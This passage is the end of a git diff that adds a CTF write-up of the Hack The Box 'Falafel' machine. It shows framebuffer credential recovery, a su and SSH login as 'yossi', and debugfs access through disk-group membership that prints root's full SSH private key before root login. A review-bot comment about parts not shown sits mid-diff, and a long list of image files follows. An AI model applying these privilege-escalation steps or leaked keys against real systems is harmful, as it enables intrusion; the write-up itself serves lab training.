+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/runtime_enabled
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/runtime_active_kids
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/runtime_active_time
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/autosuspend_delay_ms
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/runtime_status
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/runtime_usage
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/runtime_suspended_time
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/state
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/bl_curve
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/bits_per_pixel
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/device
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/cursor
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/subsystem
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/rotate
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/stride
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/uevent
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/virtual_size
+ ./class/graphics/fb0
+ find: ‘./kernel/debug’: Permission denied
+
+ moshe@falafel:/sys$ ls -lash class/graphics/fb0
+ 0 lrwxrwxrwx 1 root root 0 Dec 21 12:39 class/graphics/fb0 -> ../../devices/pci0000:00/0000:00:0f.0/graphics/fb0
+
+
+And here we see that class/graphics/fb0 is a symlink to ../../devices/pci0000:00/0000:00:0f.0/graphics/fb0 so let's go there and see what's in it:
+
+
+ moshe@falafel:/sys$ cd devices/pci0000:00/0000:00:0f.0/graphics/fb0
+ moshe@falafel:/sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0$ ls -lash
+ total 0
+ 0 drwxr-xr-x 3 root root 0 Dec 21 12:39 .
+ 0 drwxr-xr-x 3 root root 0 Dec 21 12:39 ..
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 bits_per_pixel
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 blank
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 bl_curve
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 console
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 cursor
+ 0 -r--r--r-- 1 root root 4.0K Dec 21 17:06 dev
+ 0 lrwxrwxrwx 1 root root 0 Dec 21 17:06 device -> ../../../0000:00:0f.0
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 mode
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 modes
+ 0 -r--r--r-- 1 root root 4.0K Dec 21 17:06 name
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 pan
+ 0 drwxr-xr-x 2 root root 0 Dec 21 17:01 power
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 rotate
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 state
+ 0 -r--r--r-- 1 root root 4.0K Dec 21 17:06 stride
+ 0 lrwxrwxrwx 1 root root 0 Dec 21 12:39 subsystem -> ../../../../../class/graphics
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 uevent
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 virtual_size
+ moshe@falafel:/sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0$ cat virtual_size
+ 1176,885
+ moshe@falafel:/sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0$
+
+
+
+And there we have it, we have the size of the raw image file we needed, so it's 1176 x 885:
+
+ 
+
+We still see some garbage but we just need to pick the RGB565 option and then we see:
+
+
+
+And we have it! we got the following credentials: **yossi:MoshePlzStopHackingMe!** with these credentials, we're going to login as yassi:
+
+
+ moshe@falafel:/sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0$ su yossi -
+ Password:
+ bash: cannot set terminal process group (-1): Inappropriate ioctl for device
+ bash: no job control in this shell
+ yossi@falafel:/sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0$ cd ~
+
+ yossi@falafel:~$ pwd
+ /home/yossi
+
+ yossi@falafel:~$ ls -lash
+ total 24K
+ 4.0K drwx------ 3 yossi yossi 4.0K Jan 14 2018 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Nov 27 2017 ..
+ 0 -rw------- 1 root root 0 Jan 14 2018 .bash_history
+ 4.0K -rw-r--r-- 1 yossi yossi 220 Nov 27 2017 .bash_logout
+ 4.0K -rw-r--r-- 1 yossi yossi 3.7K Nov 27 2017 .bashrc
+ 4.0K drwx------ 2 yossi yossi 4.0K Nov 27 2017 .cache
+ 4.0K -rw-r--r-- 1 yossi yossi 655 Nov 27 2017 .profile
+
+
+
+And from here we can see that we have been able to login as the user yossi via the su command, but we can also do it via ssh:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/29 ] [~/_HTB/Falafel]
+ → ssh yossi@10.10.10.73
+ yossi@10.10.10.73's password:
+ Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Mon Dec 21 12:39:26 2020
+ yossi@falafel:~$ ls -lash
+ total 24K
+ 4.0K drwx------ 3 yossi yossi 4.0K Jan 14 2018 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Nov 27 2017 ..
+ 0 -rw------- 1 root root 0 Jan 14 2018 .bash_history
+ 4.0K -rw-r--r-- 1 yossi yossi 220 Nov 27 2017 .bash_logout
+ 4.0K -rw-r--r-- 1 yossi yossi 3.7K Nov 27 2017 .bashrc
+ 4.0K drwx------ 2 yossi yossi 4.0K Nov 27 2017 .cache
+ 4.0K -rw-r--r-- 1 yossi yossi 655 Nov 27 2017 .profile
+
+ yossi@falafel:~$ id
+ uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)
+
+
+And here we see something interesting, yossi is part of the disk group, which theorically means he can read whatever is on the disks
+
+
+
+ yossi@falafel:~$ strings /dev/sda1 | grep root.txt
+ <****file:Documentation/filesystems/nfs/nfsroot.txt>. <****file:Documentation/filesystems/nfs/nfsroot.txt> for details.
+ Read <****file:Documentation/filesystems/nfs/nfsroot.txt> for details. <****file:Documentation/filesystems/nfs/nfsroot.txt> for details. <****file:Documentation/filesystems/nfs/nfsroot.txt>.
+
+However the intended path is to use the debugfs command:
+
+
+
+ yossi@falafel:~$ debugfs /dev/sda1
+ debugfs 1.42.13 (17-May-2015)
+ debugfs: ls
+ debugfs: cd root
+ debugfs: ls
+ debugfs: cd .ssh
+ debugfs: cat id_rsa
+ -----BEGIN RSA PRIVATE KEY-----
+ MIIEpAIBAAKCAQEAyPdlQuyVr/L4xXiDVK8lTn88k4zVEEfiRVQ1AWxQPOHY7q0h
+ b+Zd6WPVczObUnC+TaElpDXhf3gjLvjXvn7qGuZekNdB1aoWt5IKT90yz9vUx/gf
+ v22+b8XdCdzyXpJW0fAmEN+m5DAETxHDzPdNfpswwYpDX0gqLCZIuMC7Z8D8Wpkg
+ BWQ5RfpdFDWvIexRDfwj/Dx+tiIPGcYtkpQ/UihaDgF0gwj912Zc1N5+0sILX/Qd
+ UQ+ZywP/qj1FI+ki/kJcYsW/5JZcG20xS0QgNvUBGpr+MGh2urh4angLcqu5b/ZV
+ dmoHaOx/UOrNywkp486/SQtn30Er7SlM29/8PQIDAQABAoIBAQCGd5qmw/yIZU/1
+ eWSOpj6VHmee5q2tnhuVffmVgS7S/d8UHH3yDLcrseQhmBdGey+qa7fu/ypqCy2n
+ gVOCIBNuelQuIAnp+EwI+kuyEnSsRhBC2RANG1ZAHal/rvnxM4OqJ0ChK7TUnBhV
+ +7IClDqjCx39chEQUQ3+yoMAM91xVqztgWvl85Hh22IQgFnIu/ghav8Iqps/tuZ0
+ /YE1+vOouJPD894UEUH5+Bj+EvBJ8+pyXUCt7FQiidWQbSlfNLUWNdlBpwabk6Td
+ OnO+rf/vtYg+RQC+Y7zUpyLONYP+9S6WvJ/lqszXrYKRtlQg+8Pf7yhcOz/n7G08
+ kta/3DH1AoGBAO0itIeAiaeXTw5dmdza5xIDsx/c3DU+yi+6hDnV1KMTe3zK/yjG
+ UBLnBo6FpAJr0w0XNALbnm2RToX7OfqpVeQsAsHZTSfmo4fbQMY7nWMvSuXZV3lG
+ ahkTSKUnpk2/EVRQriFjlXuvBoBh0qLVhZIKqZBaavU6iaplPVz72VvLAoGBANj0
+ GcJ34ozu/XuhlXNVlm5ZQqHxHkiZrOU9aM7umQkGeM9vNFOwWYl6l9g4qMq7ArMr
+ 5SmT+XoWQtK9dSHVNXr4XWRaH6aow/oazY05W/BgXRMxolVSHdNE23xuX9dlwMPB
+ f/y3ZeVpbREroPOx9rZpYiE76W1gZ67H6TV0HJcXAoGBAOdgCnd/8lAkcY2ZxIva
+ xsUr+PWo4O/O8SY6vdNUkWIAm2e7BdX6EZ0v75TWTp3SKR5HuobjVKSht9VAuGSc
+ HuNAEfykkwTQpFTlmEETX9CsD09PjmsVSmZnC2Wh10FaoYT8J7sKWItSzmwrhoM9
+ BVPmtWXU4zGdST+KAqKcVYubAoGAHR5GBs/IXFoHM3ywblZiZlUcmFegVOYrSmk/
+ k+Z6K7fupwip4UGeAtGtZ5vTK8KFzj5p93ag2T37ogVDn1LaZrLG9h0Sem/UPdEz
+ HW1BZbXJSDY1L3ZiAmUPgFfgDSze/mcOIoEK8AuCU/ejFpIgJsNmJEfCQKfbwp2a
+ M05uN+kCgYBq8iNfzNHK3qY+iaQNISQ657Qz0sPoMrzQ6gAmTNjNfWpU8tEHqrCP
+ NZTQDYCA31J/gKIl2BT8+ywQL50avvbxcXZEsy14ExVnaTpPQ9m2INlxz97YLxjZ
+ FEUbkAlzcvN/S3LJiFbnkQ7uJ0nPj4oPw1XBcmsQoBwPFOcCEvHSrg==
+ -----END RSA PRIVATE KEY-----
+
+
+
+And basically here, you've managed to get the root user's private ssh key, so just save it locally, give it the correct permissions, and login as root via ssh:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/29 ] [~/_HTB/Falafel]
+ → vim id_rsa
+
+ [ 10.10.14.6/23 ] [ /dev/pts/29 ] [~/_HTB/Falafel]
+ → chmod 600 id_rsa
+
+ [ 10.10.14.6/23 ] [ /dev/pts/29 ] [~/_HTB/Falafel]
+ → ssh root@10.10.10.73 -i id_rsa
+ Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Mon Dec 21 16:47:49 2020 from 10.10.14.16
+ root@falafel:~# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@falafel:~# ls -lash
+ total 36K
+ 4.0K drwxr-x--- 5 root root 4.0K Feb 5 2018 .
+ 4.0K drwxr-xr-x 23 root root 4.0K Feb 5 2018 ..
+ 0 -rw------- 1 root root 0 Jan 14 2018 .bash_history
+ 4.0K -rw------- 1 root root 3.1K Nov 27 2017 .bashrc
+ 4.0K drwx------ 2 root root 4.0K Nov 27 2017 .cache
+ 4.0K drwxr-xr-x 2 root root 4.0K Jan 15 2018 .nano
+ 4.0K -rw------- 1 root root 148 Aug 17 2015 .profile
+ 4.0K -r-------- 1 root root 33 Nov 27 2017 root.txt
+ 4.0K drwxr-xr-x 2 root root 4.0K Jan 15 2018 .ssh
+ 4.0K -rw-r--r-- 1 root root 206 Feb 5 2018 .wget-hsts
+ root@falafel:~# cat root.txt
+
+ 23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And there we have it! We have been able to print out the root flag of this box.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
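Review bot: The root cause of the upload bypass is never stated in one sentence; the reader has to infer from `The name is too long, 240 chars total.` followed by `New name is AAAA…AAAA.php.` that the server checks the `.gif` extension on the submitted 240-character name and only then truncates it to 236 characters, which drops `.gif` and leaves `.php` as the stored extension. Add that sentence after "Doing CTRL+U we see that it saved the file correctly as .php", together with the defensive takeaway that extension and MIME checks must run on the final, normalised filename rather than the one the client sent. Two steps are missing from the walkthrough where screenshots used to be: the command that produced `fb.raw` is absent between the `grep fb` listing and `file fb.raw` (only a stray backtick remains), and the curl-pipe-to-bash line and the linpeas findings promised after "linpeas found a few interesting things for us" are likewise absent, so the text refers to output the reader cannot see. Style: markdown bold markers leaked into the indented code listings and corrupt the quoted source, e.g. `<****?php` and `**define('DB_USERNAME', 'moshe');` in connection.php and `<****file:Documentation/…` in the strings output; keep those listings as plain text. Typos to fix in the prose: "acccept", "theorically", "it's size", and "login as yassi" (should be yossi).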
diff --git a/Hard/img/0.png b/Hard/img/0.png
new file mode 100644
index 0000000..65b7216
Binary files /dev/null and b/Hard/img/0.png differ
diff --git a/Hard/img/0_graph.png b/Hard/img/0_graph.png
new file mode 100644
index 0000000..a711049
Binary files /dev/null and b/Hard/img/0_graph.png differ
diff --git a/Hard/img/1.png b/Hard/img/1.png
new file mode 100644
index 0000000..f63f9fb
Binary files /dev/null and b/Hard/img/1.png differ
diff --git a/Hard/img/10.png b/Hard/img/10.png
new file mode 100644
index 0000000..fc8641e
Binary files /dev/null and b/Hard/img/10.png differ
diff --git a/Hard/img/10_graph.png b/Hard/img/10_graph.png
new file mode 100644
index 0000000..800d976
Binary files /dev/null and b/Hard/img/10_graph.png differ
diff --git a/Hard/img/11.png b/Hard/img/11.png
new file mode 100644
index 0000000..37bb818
Binary files /dev/null and b/Hard/img/11.png differ
diff --git a/Hard/img/12.png b/Hard/img/12.png
new file mode 100644
index 0000000..8c23170
Binary files /dev/null and b/Hard/img/12.png differ
diff --git a/Hard/img/13.png b/Hard/img/13.png
new file mode 100644
index 0000000..d27be83
Binary files /dev/null and b/Hard/img/13.png differ
diff --git a/Hard/img/14.png b/Hard/img/14.png
new file mode 100644
index 0000000..ab95758
Binary files /dev/null and b/Hard/img/14.png differ
diff --git a/Hard/img/15.png b/Hard/img/15.png
new file mode 100644
index 0000000..0a2c68c
Binary files /dev/null and b/Hard/img/15.png differ
diff --git a/Hard/img/16.png b/Hard/img/16.png
new file mode 100644
index 0000000..58f897f
Binary files /dev/null and b/Hard/img/16.png differ
diff --git a/Hard/img/17.png b/Hard/img/17.png
new file mode 100644
index 0000000..cbc0f43
Binary files /dev/null and b/Hard/img/17.png differ
diff --git a/Hard/img/18.png b/Hard/img/18.png
new file mode 100644
index 0000000..8dc7ae4
Binary files /dev/null and b/Hard/img/18.png differ
diff --git a/Hard/img/19.png b/Hard/img/19.png
new file mode 100644
index 0000000..62f2494
Binary files /dev/null and b/Hard/img/19.png differ
diff --git a/Hard/img/2.png b/Hard/img/2.png
new file mode 100644
index 0000000..f060c57
Binary files /dev/null and b/Hard/img/2.png differ
diff --git a/Hard/img/20.png b/Hard/img/20.png
new file mode 100644
index 0000000..db810eb
Binary files /dev/null and b/Hard/img/20.png differ
diff --git a/Hard/img/21.png b/Hard/img/21.png
new file mode 100644
index 0000000..7487b78
Binary files /dev/null and b/Hard/img/21.png differ
diff --git a/Hard/img/22.png b/Hard/img/22.png
new file mode 100644
index 0000000..1be424b
Binary files /dev/null and b/Hard/img/22.png differ
diff --git a/Hard/img/23.png b/Hard/img/23.png
new file mode 100644
index 0000000..9b64961
Binary files /dev/null and b/Hard/img/23.png differ
diff --git a/Hard/img/24.png b/Hard/img/24.png
new file mode 100644
index 0000000..d060e3e
Binary files /dev/null and b/Hard/img/24.png differ
diff --git a/Hard/img/25.png b/Hard/img/25.png
new file mode 100644
index 0000000..303e5a5
Binary files /dev/null and b/Hard/img/25.png differ
diff --git a/Hard/img/26.png b/Hard/img/26.png
new file mode 100644
index 0000000..c20ca1b
Binary files /dev/null and b/Hard/img/26.png differ
diff --git a/Hard/img/27.png b/Hard/img/27.png
new file mode 100644
index 0000000..218c60a
Binary files /dev/null and b/Hard/img/27.png differ
diff --git a/Hard/img/28.png b/Hard/img/28.png
new file mode 100644
index 0000000..66e98c9
Binary files /dev/null and b/Hard/img/28.png differ
diff --git a/Hard/img/29.png b/Hard/img/29.png
new file mode 100644
index 0000000..2674227
Binary files /dev/null and b/Hard/img/29.png differ
diff --git a/Hard/img/2_graph.png b/Hard/img/2_graph.png
new file mode 100644
index 0000000..df96857
Binary files /dev/null and b/Hard/img/2_graph.png differ
diff --git a/Hard/img/3.png b/Hard/img/3.png
new file mode 100644
index 0000000..923ec72
Binary files /dev/null and b/Hard/img/3.png differ
diff --git a/Hard/img/30.png b/Hard/img/30.png
new file mode 100644
index 0000000..484bf6e
Binary files /dev/null and b/Hard/img/30.png differ
diff --git a/Hard/img/31.png b/Hard/img/31.png
new file mode 100644
index 0000000..ed91d09
Binary files /dev/null and b/Hard/img/31.png differ
diff --git a/Hard/img/32.png b/Hard/img/32.png
new file mode 100644
index 0000000..f6c4144
Binary files /dev/null and b/Hard/img/32.png differ
diff --git a/Hard/img/33.png b/Hard/img/33.png
new file mode 100644
index 0000000..d57fc52
Binary files /dev/null and b/Hard/img/33.png differ
diff --git a/Hard/img/34.png b/Hard/img/34.png
new file mode 100644
index 0000000..bfaba4d
Binary files /dev/null and b/Hard/img/34.png differ
diff --git a/Hard/img/35.png b/Hard/img/35.png
new file mode 100644
index 0000000..4fd0337
Binary files /dev/null and b/Hard/img/35.png differ
diff --git a/Hard/img/36.png b/Hard/img/36.png
new file mode 100644
index 0000000..7e63820
Binary files /dev/null and b/Hard/img/36.png differ
diff --git a/Hard/img/37.png b/Hard/img/37.png
new file mode 100644
index 0000000..24d81a5
Binary files /dev/null and b/Hard/img/37.png differ
diff --git a/Hard/img/38.png b/Hard/img/38.png
new file mode 100644
index 0000000..4e7d6e3
Binary files /dev/null and b/Hard/img/38.png differ
diff --git a/Hard/img/39.png b/Hard/img/39.png
new file mode 100644
index 0000000..3acc319
Binary files /dev/null and b/Hard/img/39.png differ
diff --git a/Hard/img/3_graph.png b/Hard/img/3_graph.png
new file mode 100644
index 0000000..9faca42
Binary files /dev/null and b/Hard/img/3_graph.png differ
diff --git a/Hard/img/4.png b/Hard/img/4.png
new file mode 100644
index 0000000..f1d5984
Binary files /dev/null and b/Hard/img/4.png differ
diff --git a/Hard/img/4_graph.png b/Hard/img/4_graph.png
new file mode 100644
index 0000000..835c2e3
Binary files /dev/null and b/Hard/img/4_graph.png differ
diff --git a/Hard/img/5.png b/Hard/img/5.png
new file mode 100644
index 0000000..486ac82
Binary files /dev/null and b/Hard/img/5.png differ
diff --git a/Hard/img/5_graph.png b/Hard/img/5_graph.png
new file mode 100644
index 0000000..e67ac88
Binary files /dev/null and b/Hard/img/5_graph.png differ
diff --git a/Hard/img/6.png b/Hard/img/6.png
new file mode 100644
index 0000000..b344bb2
Binary files /dev/null and b/Hard/img/6.png differ
diff --git a/Hard/img/6_graph.png b/Hard/img/6_graph.png
new file mode 100644
index 0000000..8bc149c
Binary files /dev/null and b/Hard/img/6_graph.png differ
diff --git a/Hard/img/7.png b/Hard/img/7.png
new file mode 100644
index 0000000..3a4f83a
Binary files /dev/null and b/Hard/img/7.png differ
diff --git a/Hard/img/7_graph.png b/Hard/img/7_graph.png
new file mode 100644
index 0000000..d7766fa
Binary files /dev/null and b/Hard/img/7_graph.png differ
diff --git a/Hard/img/8.png b/Hard/img/8.png
new file mode 100644
index 0000000..878ef38
Binary files /dev/null and b/Hard/img/8.png differ
diff --git a/Hard/img/8_graph.png b/Hard/img/8_graph.png
new file mode 100644
index 0000000..d62c965
Binary files /dev/null and b/Hard/img/8_graph.png differ
diff --git a/Hard/img/9.png b/Hard/img/9.png
new file mode 100644
index 0000000..c55b0c9
Binary files /dev/null and b/Hard/img/9.png differ
diff --git a/Hard/img/9_graph.png b/Hard/img/9_graph.png
new file mode 100644
index 0000000..4939276
Binary files /dev/null and b/Hard/img/9_graph.png differ
diff --git a/Hard/prg/1/001.png b/Hard/prg/1/001.png
new file mode 100644
index 0000000..87cf6cf
Binary files /dev/null and b/Hard/prg/1/001.png differ
diff --git a/Hard/prg/1/002.png b/Hard/prg/1/002.png
new file mode 100644
index 0000000..55f8dca
Binary files /dev/null and b/Hard/prg/1/002.png differ
diff --git a/Hard/prg/1/003.png b/Hard/prg/1/003.png
new file mode 100644
index 0000000..2b453e3
Binary files /dev/null and b/Hard/prg/1/003.png differ
diff --git a/Hard/prg/1/004.png b/Hard/prg/1/004.png
new file mode 100644
index 0000000..75cb884
Binary files /dev/null and b/Hard/prg/1/004.png differ
diff --git a/Hard/prg/1/005.png b/Hard/prg/1/005.png
new file mode 100644
index 0000000..ba313cd
Binary files /dev/null and b/Hard/prg/1/005.png differ
diff --git a/Hard/prg/1/006.png b/Hard/prg/1/006.png
new file mode 100644
index 0000000..ae4c329
Binary files /dev/null and b/Hard/prg/1/006.png differ
diff --git a/Hard/prg/1/007.png b/Hard/prg/1/007.png
new file mode 100644
index 0000000..f399b2c
Binary files /dev/null and b/Hard/prg/1/007.png differ
diff --git a/Hard/prg/1/008.png b/Hard/prg/1/008.png
new file mode 100644
index 0000000..cfa82da
Binary files /dev/null and b/Hard/prg/1/008.png differ
diff --git a/Hard/prg/1/009.png b/Hard/prg/1/009.png
new file mode 100644
index 0000000..4dcf3ab
Binary files /dev/null and b/Hard/prg/1/009.png differ
diff --git a/Hard/prg/1/010.png b/Hard/prg/1/010.png
new file mode 100644
index 0000000..fda2ba9
Binary files /dev/null and b/Hard/prg/1/010.png differ
diff --git a/Hard/prg/1/011.png b/Hard/prg/1/011.png
new file mode 100644
index 0000000..a73f6b9
Binary files /dev/null and b/Hard/prg/1/011.png differ
diff --git a/Hard/prg/1/012.png b/Hard/prg/1/012.png
new file mode 100644
index 0000000..4f3a46f
Binary files /dev/null and b/Hard/prg/1/012.png differ
diff --git a/Hard/prg/1/013.png b/Hard/prg/1/013.png
new file mode 100644
index 0000000..a3dd460
Binary files /dev/null and b/Hard/prg/1/013.png differ
diff --git a/Hard/prg/1/014.png b/Hard/prg/1/014.png
new file mode 100644
index 0000000..f5cdb19
Binary files /dev/null and b/Hard/prg/1/014.png differ
diff --git a/Hard/prg/10/1.png b/Hard/prg/10/1.png
new file mode 100644
index 0000000..f7aad63
Binary files /dev/null and b/Hard/prg/10/1.png differ
diff --git a/Hard/prg/10/2.png b/Hard/prg/10/2.png
new file mode 100644
index 0000000..e275656
Binary files /dev/null and b/Hard/prg/10/2.png differ
diff --git a/Hard/prg/10/3.png b/Hard/prg/10/3.png
new file mode 100644
index 0000000..f545908
Binary files /dev/null and b/Hard/prg/10/3.png differ
diff --git a/Hard/prg/10/4.png b/Hard/prg/10/4.png
new file mode 100644
index 0000000..0e4bb95
Binary files /dev/null and b/Hard/prg/10/4.png differ
diff --git a/Hard/prg/10/5.png b/Hard/prg/10/5.png
new file mode 100644
index 0000000..dd6c103
Binary files /dev/null and b/Hard/prg/10/5.png differ
diff --git a/Hard/prg/10/6.png b/Hard/prg/10/6.png
new file mode 100644
index 0000000..43c3217
Binary files /dev/null and b/Hard/prg/10/6.png differ
diff --git a/Hard/prg/11/0.png b/Hard/prg/11/0.png
new file mode 100644
index 0000000..e485af5
Binary files /dev/null and b/Hard/prg/11/0.png differ
diff --git a/Hard/prg/11/1.png b/Hard/prg/11/1.png
new file mode 100644
index 0000000..4143127
Binary files /dev/null and b/Hard/prg/11/1.png differ
diff --git a/Hard/prg/11/2.png b/Hard/prg/11/2.png
new file mode 100644
index 0000000..ef27b3e
Binary files /dev/null and b/Hard/prg/11/2.png differ
diff --git a/Hard/prg/11/3.png b/Hard/prg/11/3.png
new file mode 100644
index 0000000..1782b27
Binary files /dev/null and b/Hard/prg/11/3.png differ
diff --git a/Hard/prg/11/4.png b/Hard/prg/11/4.png
new file mode 100644
index 0000000..0bcef5a
Binary files /dev/null and b/Hard/prg/11/4.png differ
diff --git a/Hard/prg/11/5.png b/Hard/prg/11/5.png
new file mode 100644
index 0000000..d4d24ed
Binary files /dev/null and b/Hard/prg/11/5.png differ
diff --git a/Hard/prg/11/6.png b/Hard/prg/11/6.png
new file mode 100644
index 0000000..60835e9
Binary files /dev/null and b/Hard/prg/11/6.png differ
diff --git a/Hard/prg/12/1.png b/Hard/prg/12/1.png
new file mode 100644
index 0000000..53a002d
Binary files /dev/null and b/Hard/prg/12/1.png differ
diff --git a/Hard/prg/12/10.png b/Hard/prg/12/10.png
new file mode 100644
index 0000000..d95e17c
Binary files /dev/null and b/Hard/prg/12/10.png differ
diff --git a/Hard/prg/12/11.png b/Hard/prg/12/11.png
new file mode 100644
index 0000000..68d3ea7
Binary files /dev/null and b/Hard/prg/12/11.png differ
diff --git a/Hard/prg/12/12.png b/Hard/prg/12/12.png
new file mode 100644
index 0000000..f2235b3
Binary files /dev/null and b/Hard/prg/12/12.png differ
diff --git a/Hard/prg/12/13.png b/Hard/prg/12/13.png
new file mode 100644
index 0000000..8a03d56
Binary files /dev/null and b/Hard/prg/12/13.png differ
diff --git a/Hard/prg/12/14.png b/Hard/prg/12/14.png
new file mode 100644
index 0000000..0f72a91
Binary files /dev/null and b/Hard/prg/12/14.png differ
diff --git a/Hard/prg/12/15.png b/Hard/prg/12/15.png
new file mode 100644
index 0000000..6f4a429
Binary files /dev/null and b/Hard/prg/12/15.png differ
diff --git a/Hard/prg/12/16.png b/Hard/prg/12/16.png
new file mode 100644
index 0000000..50b84b0
Binary files /dev/null and b/Hard/prg/12/16.png differ
diff --git a/Hard/prg/12/17.png b/Hard/prg/12/17.png
new file mode 100644
index 0000000..3d68ea1
Binary files /dev/null and b/Hard/prg/12/17.png differ
diff --git a/Hard/prg/12/18.png b/Hard/prg/12/18.png
new file mode 100644
index 0000000..d33e1fe
Binary files /dev/null and b/Hard/prg/12/18.png differ
diff --git a/Hard/prg/12/19.png b/Hard/prg/12/19.png
new file mode 100644
index 0000000..29947d7
Binary files /dev/null and b/Hard/prg/12/19.png differ
diff --git a/Hard/prg/12/2.png b/Hard/prg/12/2.png
new file mode 100644
index 0000000..7ab81b0
Binary files /dev/null and b/Hard/prg/12/2.png differ
diff --git a/Hard/prg/12/20.png b/Hard/prg/12/20.png
new file mode 100644
index 0000000..6005a99
Binary files /dev/null and b/Hard/prg/12/20.png differ
diff --git a/Hard/prg/12/21.png b/Hard/prg/12/21.png
new file mode 100644
index 0000000..64bff75
Binary files /dev/null and b/Hard/prg/12/21.png differ
diff --git a/Hard/prg/12/22.png b/Hard/prg/12/22.png
new file mode 100644
index 0000000..451fc3d
Binary files /dev/null and b/Hard/prg/12/22.png differ
diff --git a/Hard/prg/12/3.png b/Hard/prg/12/3.png
new file mode 100644
index 0000000..947dcaf
Binary files /dev/null and b/Hard/prg/12/3.png differ
diff --git a/Hard/prg/12/4.png b/Hard/prg/12/4.png
new file mode 100644
index 0000000..ce2be83
Binary files /dev/null and b/Hard/prg/12/4.png differ
diff --git a/Hard/prg/12/5.png b/Hard/prg/12/5.png
new file mode 100644
index 0000000..b963bf2
Binary files /dev/null and b/Hard/prg/12/5.png differ
diff --git a/Hard/prg/12/6.png b/Hard/prg/12/6.png
new file mode 100644
index 0000000..cd54b4c
Binary files /dev/null and b/Hard/prg/12/6.png differ
diff --git a/Hard/prg/12/7.png b/Hard/prg/12/7.png
new file mode 100644
index 0000000..cc4563e
Binary files /dev/null and b/Hard/prg/12/7.png differ
diff --git a/Hard/prg/12/8.png b/Hard/prg/12/8.png
new file mode 100644
index 0000000..a4f2903
Binary files /dev/null and b/Hard/prg/12/8.png differ
diff --git a/Hard/prg/12/9.png b/Hard/prg/12/9.png
new file mode 100644
index 0000000..bf85ab5
Binary files /dev/null and b/Hard/prg/12/9.png differ
diff --git a/Hard/prg/13/1.png b/Hard/prg/13/1.png
new file mode 100644
index 0000000..4ef11ba
Binary files /dev/null and b/Hard/prg/13/1.png differ
diff --git a/Hard/prg/13/2.png b/Hard/prg/13/2.png
new file mode 100644
index 0000000..c8a79b6
Binary files /dev/null and b/Hard/prg/13/2.png differ
diff --git a/Hard/prg/13/3.png b/Hard/prg/13/3.png
new file mode 100644
index 0000000..5473646
Binary files /dev/null and b/Hard/prg/13/3.png differ
diff --git a/Hard/prg/13/4.png b/Hard/prg/13/4.png
new file mode 100644
index 0000000..4d63b17
Binary files /dev/null and b/Hard/prg/13/4.png differ
diff --git a/Hard/prg/13/5.png b/Hard/prg/13/5.png
new file mode 100644
index 0000000..a3dbcf8
Binary files /dev/null and b/Hard/prg/13/5.png differ
diff --git a/Hard/prg/2/001.png b/Hard/prg/2/001.png
new file mode 100644
index 0000000..5c693a7
Binary files /dev/null and b/Hard/prg/2/001.png differ
diff --git a/Hard/prg/2/002.png b/Hard/prg/2/002.png
new file mode 100644
index 0000000..8b0cba4
Binary files /dev/null and b/Hard/prg/2/002.png differ
diff --git a/Hard/prg/2/003.png b/Hard/prg/2/003.png
new file mode 100644
index 0000000..bfe5489
Binary files /dev/null and b/Hard/prg/2/003.png differ
diff --git a/Hard/prg/2/004.png b/Hard/prg/2/004.png
new file mode 100644
index 0000000..26849c4
Binary files /dev/null and b/Hard/prg/2/004.png differ
diff --git a/Hard/prg/2/005.png b/Hard/prg/2/005.png
new file mode 100644
index 0000000..0a47c49
Binary files /dev/null and b/Hard/prg/2/005.png differ
diff --git a/Hard/prg/2/006.png b/Hard/prg/2/006.png
new file mode 100644
index 0000000..0c1e363
